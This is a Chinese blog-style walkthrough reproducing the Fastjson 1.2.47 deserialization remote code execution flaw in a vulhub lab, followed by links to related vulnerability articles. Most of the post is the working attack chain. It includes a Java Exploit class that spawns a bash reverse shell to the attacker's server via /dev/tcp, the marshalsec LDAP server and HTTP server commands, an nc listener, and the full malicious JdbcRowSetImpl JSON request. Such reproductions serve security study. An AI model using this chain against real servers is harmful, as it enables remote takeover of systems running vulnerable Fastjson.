Fastjson-1.2.47反序列化漏洞复现
漏洞 序列化 复现 1.2 fastjson 47
2023-06-13 09:11:07 时间
Fastjson-1.2.47反序列化漏洞复现
提前准备:
1、使用vulhub来启动环境
2、VPS1:查看Java版本
[root@clean-post-1 ~]# java -version openjdk version "1.8.0_262" OpenJDK Runtime Environment (build 1.8.0_262-b10)
3、VPS2:nc -lvvp 1111 进行监听
进一步设置:
Exploit.java文件,Exploit.class文件,marshalsec-0.0.3-SNAPSHOT-all.jar 这三个文件必须在一个文件夹里
构造恶意的CLASS文件从而REC
- 创建Exploit.java文件
public class Exploit { public Exploit(){ try{ Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/VPS2的IP/1111 0>&1"); }catch(Exception e){ e.printStackTrace(); } } public static void main(String[] argv){ Exploit e = new Exploit(); } }
- 编译成class文件,生成Exploit.class
javac Exploit.java
启动LDAP服务和WEB服务(这里我的LDAP和WEB服务都是在VPS1上启动的)
- 在启动LDAP服务前需要使用marshalsec来启动
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://VPS1的IP/#Exploit 7777
- 启动WEB服务
python2 -m http.server 80
到目前为止所有配置已经完成
最后干就完了!
- 浏览器访问docker启动的jastjson环境
http://docker环境IP:8090/
- burp抓包修改包 `POST / HTTP/1.1 Host: docker环境IP:8090 Content-Type: application/json Content-Length: 271 { "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://VPS1的IP:7777/Exploit", "autoCommit":true } }`
最后结果图
Q.E.D.
相关文章
- 漏洞简述
- Weblogic SSRF漏洞[通俗易懂]
- 分析调试apache shiro反序列化漏洞(CVE-2016-4437)
- Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)
- 漏洞复现 - - - WebLogic反序列化远程命令执行漏洞(二)
- SpringBoot框架SpEL表达式注入漏洞复现与原理分析
- 前端中存在的变量劫持漏洞
- Windows Print Spooler权限提升漏洞复现(CVE-2021-1675)
- FastJson反序列化漏洞修复
- CVE-2013-2251 S2-016 远程代码执行漏洞
- CNVD-2022-42853:禅道V16.5SQL注入漏洞
- 阿里云因发现Log4j2核弹级漏洞但未及时上报,被工信部处罚...
- Apache Solr代码执行漏洞自助处置手册
- 开发者发现苹果自研M1有巨大漏洞:不改设计无法修复
- iOS的奇怪漏洞会导致iPhone必须重置 恶作剧者可能会利用漏洞进行破坏
- 如何发现 NTP 放大攻击漏洞
- 系统出现重大漏洞,Windows用户要小心了
- 火狐浏览器出现严重远程代码执行漏洞,现已修复
- Linux堆溢出漏洞利用之unlink
- :分析SQL Server漏洞及如何防范(sqlserver 漏洞)
- oracle11g 系统漏洞分析(oracle11g 漏洞)
- Windows下PHP的任意文件执行漏洞